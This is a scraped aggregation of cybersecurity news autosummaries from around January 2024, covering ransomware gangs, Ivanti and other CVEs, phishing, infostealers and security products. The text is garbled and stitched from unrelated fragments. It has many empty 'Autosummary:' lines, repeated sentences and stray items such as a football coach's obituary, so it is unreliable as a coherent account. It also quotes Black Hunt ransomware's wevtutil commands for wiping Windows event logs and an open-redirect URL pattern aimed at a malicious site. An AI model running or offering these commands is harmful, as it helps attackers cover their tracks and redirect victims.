Our integrated solutions combine EP, VPM, and EDR technologies, tailored to your organization’s specific needs, including: ThreatDown EDR detecting LockBit ransomware ThreatDown automatically quarantining LockBit ransomware For resource-constrained organizations, select ThreatDown bundles offer Managed Detection and Response (MDR) services, providing expert monitoring and swift threat response to ransomware attacks—without the need for large in-house cybersecurity teams. Known ransomware attacks by gang, December 2023 Known ransomware attacks by country, December 2023 Known ransomware attacks by industry, December 2023 In other news, LockBit’s attack on Capital Health last month was starkly reminiscent of events from a year prior. DragonForce leak site WereWolves WereWolves is a new ransomware group that posted 15 victims last month across various countries, including Russia, the USA, and parts of Europe. "Autosummary:
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added an Ivanti Connect Secure and Policy Secure flaws, tracked as CVE-2024-21887 and CVE-2023-46805, and Microsoft SharePoint Server flaw CVE-2023-29357 to its Known Exploited Vulnerabilities (KEV) catalog. "Autosummary:
These two vulnerabilities have been assigned the following CVEs: CVE-2023-46805 – an authentication-bypass vulnerability with a CVSS score of 8.2 CVE-2024-21887 – a command-injection vulnerability found into multiple web components with a CVSS score of 9.1″ Follow me on Twitter: @securityaffairs and Facebook and Mastodon Pierluigi Paganini (SecurityAffairs – hacking, Connect Secure) "Autosummary:
"Autosummary:
"Autosummary:
"Autosummary:
The CVEs mentioned in these reports are: CVE-2023-46805 (CVSS score 8.2 out of 10): an authentication bypass vulnerability in the web component of Ivanti Connect Secure (9.x, 22.x) and Ivanti Policy Secure, which allows a remote attacker to access restricted resources by bypassing control checks. CISA has added CVE-2023-46805 and CVE-2024-21887 to its Known Exploited Vulnerabilities Catalog, which requires Federal Civilian Executive Branch (FCEB) agencies to remediate identified vulnerabilities by January 21, 2024 to protect FCEB networks against active threats. "Autosummary:
"Autosummary:
"In this Help Net Security video, Nick Carroll, Cyber Incident Response Manager at Raytheon, discusses how while organizations will be challenged to strengthen their defenses faster than cyber threats are evolving, this ‘come from behind’ rush to keep pace with attackers can often lead to the harmful practice of organizations skipping the foundational basics of cyber defense and failing to establish a general sense of cyber awareness within the business.
The post The power of basics in 2024’s cybersecurity strategies appeared first on Help Net Security.
"Autosummary:
"A team of computer scientists led by the University of Massachusetts Amherst recently announced a new method for automatically generating whole proofs that can be used to prevent software bugs and verify that the underlying code is correct. This new method, called Baldur, leverages the artificial intelligence power of LLMs, and, when combined with the tool Thor, yields efficacy of nearly 66%. “Software bugs have a profound impact on society today. They range from annoying … More
The post Researchers develop technique to prevent software bugs appeared first on Help Net Security.
"Autosummary:
“Reducing bugs in software, or even producing bug-free software, has been a holy grail of systems building for decades, but, unfortunately, the state-of-the-practice in our society is that we expect all software to have bugs.One benchmark, our method, combined with prior methods, generates proofs fully automatically 65.7% of the time, which is quite promising and would save engineers significant manual effort in writing these proofs,” Brun concluded. "Autosummary:
This includes Rook, Night Sky, Pandora, Nokoyawa, Cheerscrypt, AstraLocker 2.0, ESXiArgs, Rorschach, RTM Locker, and RA Group. "Autosummary:
"Autosummary:
Conti POC (.conti) REvil aka Revix (.rhkrc) Cylance ransomware (unrelated to the security company of the same name) Dataf Locker Rorschach aka BabLock Lock4 RTM Locker (per Uptycs) SentinelOne added that there are other unique ESXi ransomware families, such as ALPHV, BlackBasta, Hive, and Lockbit, that are bot based on Babuk.Decryptor for Tortilla variant of Babuk ransomware released Pierluigi Paganini January 10, 2024 January 10, 2024 Researchers and the Dutch Police released a decryptor for the Tortilla variant of the Babuk ransomware after the arrest of its operator. "Autosummary:
So far, the 33-year-old, who earns 15,000 rupees ($180; £142) per month working for a wedding party decoration company, has already lost 16,000 rupees to fraudsters – and they are asking for more. "Hackers are brute-forcing exposed MS SQL database servers to deliver Mimic ransomware, Securonix researchers are warning. About Mimic ransomware Mimic ransomware was first spotted in the wild in June 2022 and analyzed by Trend Micro researchers in January 2023. It abuses the APIs of a Windows filename search engine called Everything to search for files to be encrypted or avoided, and has the ability to delete shadow copies, kill processes and services (e.g., Windows Defender, … More
The post Hackers are targeting exposed MS SQL servers with Mimic ransomware appeared first on Help Net Security.
"Autosummary:
It abuses the APIs of a Windows filename search engine called Everything to search for files to be encrypted or avoided, and has the ability to delete shadow copies, kill processes and services (e.g., Windows Defender, Windows telemetry), unmount virtual drives, activate anti-shutdown and anti-kill measures, and more. "Autosummary:
The first security flaw (CVE-2023-46805) is an authentication bypass in the gateways" web component, enabling attackers to access restricted resources by circumventing control checks, while the second (tracked as CVE-2024-21887) is a command injection vulnerability that lets authenticated admins execute arbitrary commands on vulnerable appliances by sending specially crafted requests. "Autosummary:
Performance report lure (Cofense) Defense tips Cofense says that all examples in its report are from employees of large enterprises that use effective email security solutions, yet many phishing messages still reach their employees" inboxes. "Autosummary:
— U.S. Securities and Exchange Commission (@SECGov) January 9, 2024 The unauthorized post (which was removed within 30 minutes) looked like this: The post says: “Today the SEC grants approval to Bitcoin ETFs for listing on registered national security exchanges. To change your 2FA factor in X click on More Select Settings and Support > Settings and Privacy > Security and Account access Click Security > Two-factor authentication and put a checkmark in your preferred option. "Autosummary:
Sometimes the scammer will ask you to send through sensitive personal information (such as identity documents) to assist with the “paperwork”, other times they might ask you to wire over money in advance to cut through the red tape of bureaucracy… the point is, that you’re going to end up losing out. "Autosummary:
"Autosummary:
"We determined that an unauthorized third-party accessed certain FNF systems, deployed a type of malware that is not self-propagating, and exfiltrated certain data," reads FNF"s SEC filing. "Autosummary:
"Autosummary:
"Autosummary:
"When organizations get hit by ransomware and pay the crooks to decrypt the encrypted data and delete the stolen data, they can never be entirely sure the criminals will do as they promised. And even if an organization gets its data decrypted, they cannot be sure the stolen data has indeed been wiped and won’t subsequently be used or sold. Someone is trying to take advantage of that fact, by posing as a security researcher … More
The post “Security researcher” offers to delete data stolen by ransomware attackers appeared first on Help Net Security.
"Autosummary:
"Autosummary:
“The developer, operating under the name “Anonymous Arabic,” appears is supportive of Palestine based on their Telegram posts, and members associated with this group are active across various arenas, including social media, development platforms, underground forums, and Clearnet websites, suggesting their involvement in distributing various malware.”Cyfirma conlcudes. "Autosummary:
"Autosummary:
Midwives of Windsor has reportedly contacted clients, informing them that one of its email accounts was compromised in April 2023, allowing hackers to gain unauthorised access to the following information: Client"s name Date of birth Mailing address Email address Telephone number Information regarding pregnancy Treatment/Diagnosis information Prescription information Patient ID Health insurance information Clearly there is a good amount of sensitive information there, which could be exploited by fraudsters. "Silex Technology announced their new protection service product offering called AMC Protect, a robust software management service designed to monitor and remedy vulnerabilities. AMC Protect targets customers utilizing Silex’s embedded wireless LAN modules or purchasing Silex’s OEM products. “We have developed a cybersecurity-focused service product for customers leveraging custom firmware and software,” said Clay Fazio, VP of Product Management at Silex Technology. “While many industries are being plagued by vulnerabilities and cybersecurity attacks, the AMC … More
The post Silex Technology AMC Protect improves cybersecurity for critical devices appeared first on Help Net Security.
"Autosummary:
"A blind SQL injection vulnerability (CVE-2023-51448) in Cacti, a widely-used network monitoring, performance and fault management framework, could lead to information disclosure and potentially remote code execution. Cacti is often used in network operation centers of telecoms and web hosting providers, to collect network performance data and store it in RRDtool, a logging and graphing database and system that, through a web interface, creates graphical representations of the collected data. About CVE-2023-51448 CVE-2023-51448 is a … More
The post SQLi vulnerability in Cacti could lead to RCE (CVE-2023-51448) appeared first on Help Net Security.
"Autosummary:
"Autosummary:
"The analyzed threat campaign appears to end in one of two ways, either the selling of "access" to the compromised host, or the ultimate delivery of ransomware payloads," Securonix researchers Den Iuzvyk, Tim Peck, and Oleg Kolesnikov said in a technical report shared with The Hacker News. "Autosummary:
The number of bugs in each vulnerability category is listed below: 10 Elevation of Privilege Vulnerabilities 7 Security Feature Bypass Vulnerabilities 12 Remote Code Execution Vulnerabilities 11 Information Disclosure Vulnerabilities 6 Denial of Service Vulnerabilities 3 Spoofing Vulnerabilities The total count of 49 flaws does not include 4 Microsoft Edge flaws fixed on January 5th. "Autosummary:
"The analyzed threat campaign appears to end in one of two ways, either the selling of "access" to the compromised host, or the ultimate delivery of ransomware payloads," the Securonix Threat Research team who spotted the campaign said. "Autosummary:
"Autosummary:
wevtutil.exe cl Setup cmd.exe /c wevtutil.exe cl System cmd.exe /c wevtutil.exe cl Application cmd.exe /c wevtutil.exe cl Security cmd.exe /c wevtutil.exe cl Security /e:false In addition to the above, Black Hunt will perform a large amount of changes to Windows, including disabling Microsoft Defender, adding new users, disbaling System Restore, and disabling Task Manager and the Run command. "Autosummary:
Since then, the company has established technical and business partnerships with acclaimed global security firms, including VirusTotal, Cisco, Anomali, LogRhythm, Datadog, and more. "Researchers have discovered over two dozen vulnerabilities in “smart” cordless nutrunners (i.e., pneumatic torque wrenches) manufactured by Bosch Rexroth that could be exploited to make the devices inoperable or their output unreliable. “Depending on a manufacturer’s use and business configuration, devices such as the nutrunner may form a critical part of the quality management and assurance program in an enterprise, possibly even the last line of quality assurance. Compromise of the integrity in this final … More
The post Attackers could use vulnerabilities in Bosch Rexroth nutrunners to disrupt automotive production appeared first on Help Net Security.
"Autosummary:
After probing the security posture of the Bosch Rexroth NXA015S-36V-B nutrunner and discovering 25 vulnerabilities affecting the device’s management web application and the services parsing communications protocols, the researchers successfully tested two attack scenarios in their lab: Deployment of custom ransomware (specifically designed for the devices’ OS), and Steathy alteration of tightening programs (while manipulating the onboard display) “We were able to make the device completely inoperable by preventing a local operator from controlling the drill through the onboard display and disabling the trigger button. "Autosummary:
"Autosummary:
CISA adds Apache Superset bug to its Known Exploited Vulnerabilities catalog Pierluigi Paganini January 09, 2024 January 09, 2024 U.S. Cybersecurity and Infrastructure Security Agency (CISA) adds Apache Superset vulnerability to its Known Exploited Vulnerabilities catalog. "Autosummary:
LockBit ransomware gang claims the attack on Capital Health Pierluigi Paganini January 09, 2024 January 09, 2024 The LockBit ransomware gang claimed responsibility for the cyber attack on the Capital Health hospital network. "Autosummary:
"Autosummary:
Windows users can install this update by going into Settings, clicking on Windows Update, and manually performing a "Check for Updates." However, as this update is mandatory, it will automatically start installing in Windows once you check for updates. "Autosummary:
Once you’ve isolated the outbreak and stopped the first attack, you must remove every trace of the attackers, their malware, their tools, and their methods of entry, to avoid being attacked again. Phishing attacks often impersonate people or brands you know, and use themes that require urgent attention, such as missed deliveries, account suspensions, and security alerts.Phishing attacks often impersonate people or brands you know, and use themes that require urgent attention, such as missed deliveries, account suspensions, and security alerts.Ransomware groups are liars, yes, but even when these dangerous cybercriminals would ransack organizations and destroy entire companies, a few select groups espoused a sort of “honor among thieves.” Data breach There are some actions you can take if you are, or suspect you may have been, the victim of a data breach. "AuthLogParser is an open-source tool tailored for digital forensics and incident response, specifically crafted to analyze Linux authentication logs (auth.log). The tool examines the auth.log file, extracting crucial details like SSH logins, user creations, event names, IP addresses, among others. It produces a concise summary that offers a clear overview of the activities documented in the authentication logs, presenting the information in a format that is easy to read. AuthLogParser features “AuthLogParser’s distinctiveness lies in … More
The post AuthLogParser: Open-source tool for analyzing Linux authentication logs appeared first on Help Net Security.
"Autosummary:
Users groups activity events Successful SSH Password Authentication Successful SSH Public key Authentication New User Creation Activity User Deletion Activity User Password Change Activity New Group Creation Activity Group Deletion Activity User Added To A Group Activity User Removed From A Group Activity Session Opened For User root General activity events Machine Shutdown By Power Button Future plans In forthcoming iterations, the creator wants to elevate AuthLogParser beyond its initial success as a proof of concept. "Vim, a highly adaptable text editor, is designed to efficiently create and modify all types of text. It comes included as vi in most UNIX systems and macOS. Renowned for its rock-solid stability, Vim is constantly evolving to improve further, and version 9.1 has recently been released. The latest version focuses on fixes for unsafe memory access, leaks, buffer overflows, and potential crashes. Alongside, it introduces a handful of new features and numerous minor enhancements. … More
The post Vim 9.1 released: New features and bug fixes appeared first on Help Net Security.
"Autosummary:
"McAfee announced its AI-powered Deepfake Audio Detection technology, known as Project Mockingbird. This new, proprietary technology was developed to help defend consumers against the surging threat of cybercriminals utilizing fabricated, AI-generated audio to carry out scams that rob people of money and personal information, enable cyberbullying, and manipulate the public image of prominent figures. Increasingly sophisticated and accessible Generative AI tools have made it easier for cybercriminals to create highly convincing scams, such as using … More
The post McAfee Project Mockingbird defends users against AI-generated scams and disinformation appeared first on Help Net Security.
"Autosummary:
This new, proprietary technology was developed to help defend consumers against the surging threat of cybercriminals utilizing fabricated, AI-generated audio to carry out scams that rob people of money and personal information, enable cyberbullying, and manipulate the public image of prominent figures. “With McAfee’s latest AI detection capabilities, we will provide customers a tool that operates at more than 90% accuracy to help people understand their digital world and assess the likelihood of content being different than it seems,” said Steve Grobman, CTO, McAfee. "Autosummary:
If the report from NL Times is taken at face value, what is news is that an agent of AIVD (the Dutch intelligence agency), named as Erik van Sabben, also assisted the attack. "Autosummary:
"Autosummary:
"Though our investigation is ongoing, at this time, the Company has determined that the unauthorized third party activity included access to certain Company systems and the encryption of data," it said. "Autosummary:
Unfortunately, recent examples of high-impact ransomware attacks in the healthcare sector are abundant, including other victims, such as Ardent Health Services, Integris Health, ESO Solutions, and the Fred Hutchinson Cancer Center (Fred Hutch). "Autosummary:
"Autosummary:
Previously, Sea Turtle, also known as Teal Kurma and Cosmic Wolf, focused on the Middle Eastern region, as well as Sweden and the United States, using techniques like DNS hijacking and traffic redirection to perform man-in-the-middle attacks against government and non-government organizations, media, ISPs, and IT service providers. "Here’s an overview of some of last week’s most interesting news, articles, interviews and videos: Wi-Fi 7’s mission-critical role in enterprise, industrial networking In this Help Net Security interview, Tiago Rodrigues, CEO at Wireless Broadband Alliance, discusses the transformative world of Wi-Fi 7, exploring its features and the impact it promises to have on our digital landscape. Cybersecurity challenges emerge in the wake of API expansion In this Help Net Security interview, Vedran Cindric, CEO … More
The post Week in review: 15 open-source cybersecurity tools, Patch Tuesday forecast appeared first on Help Net Security.
"Autosummary:
Here’s an overview of some of last week’s most interesting news, articles, interviews and videos: Wi-Fi 7’s mission-critical role in enterprise, industrial networking In this Help Net Security interview, Tiago Rodrigues, CEO at Wireless Broadband Alliance, discusses the transformative world of Wi-Fi 7, exploring its features and the impact it promises to have on our digital landscape. "Autosummary:
The group targets government entities, Kurdish (political) groups like PKK, telecommunication, ISPs, IT-service providers (including security companies), NGO, and Media & Entertainment sectors; Over the years, the group enhanced its evasion capabilities. "Autosummary:
In the future, AI will undoubtedly proove to be useful in finding software bugs, but we expect these tools will be deployed by the developers themselves before the software goes live. He argues that, for some reason, bug bounty programs also attract fortune seekers that are looking for a quick buck without putting in the necessary work. "Autosummary:
"If you are seeking to make a payment, you may do so through our contact center by speaking with an agent at 866-258-6572 from 7 am CT to 7 pm CT Monday through Friday, and 8 am CT to 5 pm CT on Saturday," advises loanDepot"s servicing portal. "Autosummary:
AsyncRAT is an open-source remote access tool (RAT) for Windows, publicly available since 2019, with functions for remote command execution, keylogging, data exfiltration, and dropping additional payloads. "Autosummary:
The much-travelled coach has also taken charge of Atletico Mineiro, Athletico Paranaense, Internacional, Vasco da Gama, Fluminense and Palmeiras. "Autosummary:
" To mitigate the risks posed by such attacks, it"s advised that organizations enforce strong password policies, implement two-factor authentication (2FA), rate limit login attempts to reduce the chances of brute-force attempts, monitor SSH traffic, and keep all systems and software up-to-date. "Autosummary:
On December 24, 2023, the adversary resurfaced after a hiatus, stating it"s "back to destroy supporters of terrorists," describing its latest campaign as #DestroyDurresMilitaryCamp. "Autosummary:
The tactically astute Zagallo, nicknamed "The Professor" and "Old Wolf", pulled together a side filled with the attacking talents of Pele, Jairzinho, Gerson, Tostao and Rivellino and made them irresistible. "A devoted father, loving grandfather, caring father-in-law, faithful friend, victorious professional and a great human being. "Autosummary:
The information affected may have included: name, address, email address, date of birth, Social Security number, driver’s license or other government-issued identification number, passport number, financial account information, tax identification number, medical treatment and/or diagnosis information, claims information (date, cost of services, and claims identifiers), health insurance. "Autosummary:
Last week, cybersecurity firm CloudSEK revealed that these information-stealing malware operations are abusing a Google OAuth "MultiLogin" API endpoint to generate new, working authentication cookies when a victim"s original stolen Google cookies expire. Since then, four other information stealers have adopted the same technique, including Stealc on December 1, Medusa on December 11, RisePro on December 12, and Whitesnake on December 26. "In this Help Net Security video, Bassam Al-Khalidi, co-CEO of Axiad, discusses the results of Axiad’s recent State of Authentication Survey. Key findings from the survey revealed: – 39% indicated phishing is the most feared cyberattack, while 49% said it is the attack most likely to happen. – 88% felt their company was prepared to defend against a password-based cyberattack, yet 52% said their business had fallen victim to one within the last year. – … More
The post Breaking down the state of authentication appeared first on Help Net Security.
"Autosummary:
"Autosummary:
"Using the stolen account, the threat actor modified the AS number belonging to Orange"s IP address, resulting in major disruptions to Orange and a 50% loss in traffic," cybersecurity firm Hudson Rock said. "Autosummary:
"Autosummary:
"Autosummary:
"Autosummary:
In 2022, the Russian APT used multiple wipers in attacks aimed at Ukraine,including AwfulShred, CaddyWiper, HermeticWiper, Industroyer2, IsaacWiper, WhisperGate, Prestige, RansomBoggs, and ZeroWipe. "Autosummary:
"To support the incredible team of Grenfell Campus IT professionals in their efforts, additional information technology (IT) personnel have arrived at Grenfell to assist with on-campus needs, while IT staff in St. John"s are also working with their colleagues to support the needs at Grenfell Campus" - Memorial University of Newfoundland In an update yesterday, the university announced that internet and WiFi for resident students are still not operational. "Autosummary:
The ransomware was involved in attacks aimed at technology and healthcare, defense contractors, educational institutions, manufacturers, companies across Europe, the United States, and Canada. "Autosummary:
Contributors and those who provided new ransomware information and stories this week include: @billtoulas, @Seifreed, @LawrenceAbrams, @Ionut_Ilascu, @malwrhunterteam, @fwosar, @BleepinComputer, @serghei, @demonslay335, @Intel_by_KELA, @pcrisk, @BushidoToken, @BrettCallow, @emsisoft, @AlvieriD, and @srlabs December 30th 2023 Researchers have created a decryptor that exploits a flaw in Black Basta ransomware, allowing victims to recover their files for free. "Autosummary:
"Autosummary:
As the report describes, hackers are also compromising dormant accounts, locking out their legitimate owners, and subscribing to a gold checkmark for 30 days in order to sell the accounts to others. "Open-source tools represent a dynamic force in the technological landscape, embodying innovation, collaboration, and accessibility. These tools, developed with transparency and community-driven principles, allow users to scrutinize, modify, and adapt solutions according to their unique needs. In cybersecurity, open-source tools are invaluable assets, empowering organizations to fortify their defenses against evolving threats. In this article, you will find a list of open-source cybersecurity tools that you should definitely check out. Nemesis: Open-source offensive data enrichment … More
The post 15 open-source cybersecurity tools you’ll wish you’d known earlier appeared first on Help Net Security.
"Autosummary:
Nemesis: Open-source offensive data enrichment and analytic pipeline Nemesis is a centralized data processing platform that ingests, enriches, and performs analytics on offensive security assessment data (i.e., data collected during penetration tests and red team engagements). SessionProbe: Open-source multi-threaded pentesting tool SessionProbe is a multi-threaded pentesting tool designed to evaluate user privileges in web applications. "In 2023, businesses have been hit with 800,000 cyberattacks, over 60,000 of which were DDoS attacks and 4,000 falling victim to ransomware, according to Vercara. The research found that consumers hold nuanced perceptions regarding cybersecurity incidents and are often less aware of the role they play in maintaining cyber hygiene within a business. These findings underscore brand trust’s important role in the digital landscape – with an overwhelming 75% of consumers expressing their readiness to … More
The post Consumers prepared to ditch brands after cybersecurity issues appeared first on Help Net Security.
"Autosummary:
"Autosummary:
"Industrial Defender introduced Industrial Defender Risk Signal, its new risk-based vulnerability management (RBVM) solution. Building upon the company’s robust vulnerability assessment capabilities, Industrial Defender Risk Signal intelligently prioritizes vulnerability for highest impact, integrating threat intelligence and the user’s specific business context. Industrial Defender’s RBVM solution enables a significant evolution in vulnerability management for industrial environments. With enriched insights into which vulnerabilities matter most to the user’s specific operations, security teams can use Industrial Defender Risk … More
The post Industrial Defender Risk Signal integrates threat intelligence and business context appeared first on Help Net Security.
"Autosummary:
"Autosummary:
"Autosummary:
"Autosummary:
Crooks hacked Mandiant X account to push cryptocurrency scam Pierluigi Paganini January 04, 2024 January 04, 2024 The X account of cybersecurity giant Mandiant was hacked, attackers used it to impersonate the Phantom crypto wallet and push a cryptocurrency scam. "Autosummary:
Advertising gold-verified X accounts for sale (CloudSEK) Some sellers also provide the option to add scam accounts as affiliates to the verified gold accounts for $500, lending them credibility without having to go through the more rigorous verification process from the social media platform. "Autosummary:
Screenshots of the builder (KELA) In November 2022, following the discontinuation of the Zeppelin RaaS operation, law enforcement and security researchers disclosed they had found exploitable flaws in Zeppelin"s encryption scheme, allowing them to build a decrypter and help victims since 2020. "Autosummary:
The offer of what can be considered equivalent to "free money" has often been used in recent years by fraudsters attempting to lure the unwary, using social networks, spam, and hacked websites to drive traffic to malicious phishing sites. "Autosummary:
"Autosummary:
Zero-days exploited in the wild In July, state-affiliated hackers used two zero-day flaws (CVE-2023-35078 and CVE-2023-35081) in Ivanti"s Endpoint Manager Mobile (EPMM), formerly MobileIron Core, to infiltrate the networks of multiple Norwegian government organizations. "Autosummary:
"We attacked Kyivstar because the company provides communications to the Armed Forces of Ukraine, as well as government agencies and law enforcement agencies of Ukraine." Today, Vityuk confirmed that Sandworm was behind the December attack on Kyivstar, saying that this Russian military intelligence unit carried out other cyberattacks targeting Ukrainian targets, "in particular [..] telecom operators and ISPs. "Autosummary:
"Autosummary:
The official Mandiant account, which is followed by over 100,000 people, was seized by scammers promoting links to a phony website which claimed to offer free $PHNTM cryptocurrency tokens (but which was actually aiming to drain punters’ wallets. "In this Help Net Security interview, Vedran Cindric, CEO at Treblle, discusses the exponential growth of AI-related APIs, citing a 96% increase in 2023. He sheds light on the integral role APIs play in powering AI interactions, revealing the invisible threads that connect users to AI-based chatbots and tools. As the technological landscape increasingly integrates AI, Cindric anticipates a profound impact on the evolution of APIs, emphasizing the growing importance of API security, authentication, and … More
The post Cybersecurity challenges emerge in the wake of API expansion appeared first on Help Net Security.
"Autosummary:
As the technological landscape increasingly integrates AI, Cindric anticipates a profound impact on the evolution of APIs, emphasizing the growing importance of API security, authentication, and the challenges posed by zombie endpoints.In this Help Net Security interview, Vedran Cindric, CEO at Treblle, discusses the exponential growth of AI-related APIs, citing a 96% increase in 2023.You might not see or understand it, but at the end of the day, all those questions, image lookups, or jokes are API requests. "In this Help Net Security video, John Dwyer, Head of Research at IBM X-Force, discusses how 2024 is poised to be an incredibly impactful year for cyber attacks, driven by world events and access to advanced technologies like AI.
The post Emerging cybersecurity trends and expectations for 2024 appeared first on Help Net Security.
"Autosummary:
"Managing and allocating budgets for cybersecurity and IT has become an increasingly critical aspect of organizational strategy. Organizations recognize the need to invest significantly in cybersecurity to safeguard sensitive data, protect against ransomware attacks, and ensure the integrity of their IT infrastructure. A well-structured cybersecurity budget is crucial for staying ahead of emerging threats and minimizing potential risks. In this article, you will find excerpts from cybersecurity budget surveys we covered in 2023. These findings … More
The post Facts and misconceptions about cybersecurity budgets appeared first on Help Net Security.
"Autosummary:
This year, 20% of CISOs did not receive a raise, double that of a year ago, while the share of CISOs with bigger retention bonuses and equity packages also declined to 12% (from 21%) and to 8% (from 24%), respectively. "Mobile banking is outpacing online banking across all age groups due to its convenience and our desire to have those apps at our fingertips, according to Zimperium. However, this surge is accompanied by a dramatic growth in financial fraud. The research uncovered that 29 malware families targeted 1,800 banking applications across 61 countries last year. In comparison, the 2022 report uncovered 10 prolific malware families targeting 600 banking apps. Banking trojans persistently target mobile devices … More
The post 29 malware families target 1,800 banking apps worldwide appeared first on Help Net Security.
"Autosummary:
“By monitoring millions of devices, Zimperium has identified alarming figures highlighting how widespread, global, and successful mobile banking malware can be,” said Jon Paterson, CTO at Zimperium. Implement runtime visibility for comprehensive threat monitoring and modeling: Mobile application security leaders must enable runtime visibility across various threat vectors, including device, network, application, and phishing. "Autosummary:
“Google Chromium WebRTC, an open-source project providing web browsers with real-time communication, contains a heap buffer overflow vulnerability that allows an attacker to cause crashes or code execution,” reads CISA’s summary of the flaw. "Autosummary:
It has since been incorporated into various malware-as-a-service (MaaS) stealer families, such as Lumma, Rhadamanthys, Stealc, Meduza, RisePro, and WhiteSnake. "Autosummary:
"Autosummary:
"Autosummary:
Recognizing investment scams We are by no means financial experts, but we have seen too many good people lose money on Ponzi schemes, rug-pulls, and fake Initial Coin Offerings (ICOs), so we feel it is our job to keep you safe, and warn against these types of online investment frauds.Europols’s spotlight report ‘Online fraud schemes: a web of deceit’, looks into online fraud schemes—a major crime threat in the EU and beyond—and one of the report’s primary themes is investment fraud. Treat calls, texts, mails, and other advice out of the blue with extreme caution. "Autosummary:
This means that anyone could forge a redirect link using these subdomains by adding a string such as this: “sap/public/bc/icf/logoff?redirecturl=https://maliciouswebsite.com” The final URL would look like this: “https://<…>.bmw.com/sap/public/bc/icf/logoff?redirecturl=https://maliciouswebsite.com” “It allows an attacker to redirect a user to a malicious website or inject arbitrary content into a legitimate website. "Autosummary:
"Autosummary:
"Autosummary:
"Autosummary:
Presently, the tools crafted by the “GXC Team” are capable of targeting over 300 entities, including top financial institutions, government services, postal services, cryptocurrency platforms, payment networks, and major international online marketplaces including AMEX, Amazon, Binance, Coinbase, Office 365 (Microsoft), PayPal, ING, Santander, Deutsche Bank, Postbank, DKB AG (Das kann Bank), BBBank eG (formerly Badische Beamtenbank) and multiple Spain-based banks specifically including ABANCA, Banca March, Banco de Sabadell, Grupo Caja Rural, Unicaja Banco SA, Caixa Enginyers, Banco Mediolanum, Laboral Kutxa, Eurocaja Dynamic, BBVA, and Santander.It’s noteworthy that most of the victim accounts identified were predominantly from the U.K. and various EU countries, including but not limited to Spain, France, Poland, Italy, Germany, Switzerland, among others.Around November 11th, 2023, the group’s leader, operating under the alias “googleXcoder“, made multiple announcements on the Dark Web. "Autosummary:
CISA ADDS CHROME AND PERL LIBRARY FLAWS TO ITS KNOWN EXPLOITED VULNERABILITIES CATALOG Pierluigi Paganini January 03, 2024 January 03, 2024 U.S. Cybersecurity and Infrastructure Security Agency (CISA) adds Google Chrome and Perl library flaws to its Known Exploited Vulnerabilities catalog. "Autosummary:
"As the sophistication and frequency of cyber threats continue to escalate, the demand for skilled cybersecurity professionals has never been bigger. The skills gap is not merely a statistical discrepancy; it represents a substantial vulnerability in the defense mechanisms of businesses and institutions. From the shortage of experts in critical areas such as penetration testing and threat analysis to the broader issues of workforce diversity and continuous skill development, the problems contributing to this gap … More
The post Key cybersecurity skills gap statistics you should be aware of appeared first on Help Net Security.
"Autosummary:
Soft skills continue to challenge the cybersecurity sector When looking at soft skills, communication (58%), critical thinking (54%), problem-solving (49%), teamwork (45%), and attention to detail (36%) come in as the top five skills employers are seeking in cybersecurity job candidates. "Threat actors evolved tactics, opting for a more nuanced approach that spread attacks across a broader timeframe to blend in with legitimate traffic and evade detection during peak holiday shopping times, according to Cequence Security. 2023 holiday season unveiled alarming realities The months before the 2023 holidays demonstrated a change in tactics, techniques, and procedures by adversaries against prominent retailers. Attackers have shown that they are highly sophisticated and have great persistence and depth of … More
The post Hackers employ nuanced tactics to evade detection appeared first on Help Net Security.
"Autosummary:
In the second half of 2023 alone, gift card fraud increased by 110%, while scraping, loyalty card fraud and payment card fraud increased by a collective average of over 700% as attackers lay the groundwork for holiday sale attacks ahead of retailer security crackdowns. "As we transition from Wi-Fi 6 to the more advanced Wi-Fi 7, we uncover the significant enhancements in speed, efficiency, and spectrum usage that set it apart from its predecessors. In this Help Net Security interview, Tiago Rodrigues, CEO at Wireless Broadband Alliance, discusses the transformative world of Wi-Fi 7, exploring its features and the impact it promises to have on our digital landscape. Rodrigues examines the crucial role of AI and machine learning in … More
The post Wi-Fi 7’s mission-critical role in enterprise, industrial networking appeared first on Help Net Security.
"Autosummary:
We expect network executives will continue deploying Wi-Fi and cellular in the coming years, with Wi-Fi 6E/7 for indoor, on-campus, and fixed network situations and 5G/cellular for outdoor, off-campus, and fast-mobility environments. Wi-Fi 7 will enable consumer, enterprise, Industry 4.0, medical, smart city and other applications that are impractical or impossible with other wired and wireless technologies, providing twice the bandwidth of Wi-Fi 6 and providing features such as deterministic network support. Wi-Fi 6, 6E and 7 topped the list of wireless technologies that network operators, ISPs, device and chipset vendors, enterprises and other companies plan to deploy by the end of 2024, in our latest cross-industry report. "The cryptocurrency market has grown significantly, attracting both enthusiasts and investors. However, the rise of cryptocurrencies has also brought forth an unprecedented need for cybersecurity measures. Cybersecurity in the context of cryptocurrencies involves safeguarding not only the blockchain networks but also the digital wallets, exchanges, and trading platforms that facilitate the transfer of these assets. In this Help Net Security round-up, we present segments from previously recorded videos in which cybersecurity experts discuss the increasing … More
The post Cybercriminals set their sights on crypto markets appeared first on Help Net Security.
"Autosummary:
"Autosummary:
"Autosummary:
" Specifically, the following courts and jurisdictions have been impacted by the security incident: Supreme Court – hearings from the Court of Appeal, Criminal Division, and Practice Court between December 1 and 21, and two regional hearings in November 2023. "Autosummary:
Once you’ve isolated the outbreak and stopped the first attack, you must remove every trace of the attackers, their malware, their tools, and their methods of entry, to avoid being attacked again. Deploy Endpoint Detection and Response software like ThreatDown EDR that uses multiple different detection techniques to identify ransomware, and ransomware rollback to restore damaged system files. The decryptor, called Black Basta Buster, exploits a flaw in the encryption algorithm used in older versions of the Black Basta group’s ransomware. "Autosummary:
"Autosummary:
Researchers released a free decryptor for Black Basta ransomware Pierluigi Paganini January 02, 2024 January 02, 2024 A team of researchers released a suite of tools that could help victims to decrypt data encrypted with by the Black Basta ransomware.According to the experts, the ransomware gang has infected over 329 victims, including ABB, Capita, Dish Network, and Rheinmetall. "Autosummary:
"Autosummary:
Cactus RANSOMWARE gang hit the Swedish retail and grocery provider Coop Pierluigi Paganini January 01, 2024 January 01, 2024 The Cactus ransomware group claims to have hacked Coop, one of the largest retail and grocery providers in Sweden. "Autosummary:
"Autosummary:
Researchers from Hudson Rock were among the first to warn of threat actors exploiting the zero-day exploit: The Google 0-Day that all Infostealer groups are exploiting: https://t.co/V5EuU0LFzz pic.twitter.com/xZnobAuuap — Hudson Rock (@RockHudsonRock) December 27, 2023 CloudSEK performed a reverse engineering of the exploit and discovered it relies on an undocumented Google OAuth endpoint named ‘MultiLogin. "Autosummary:
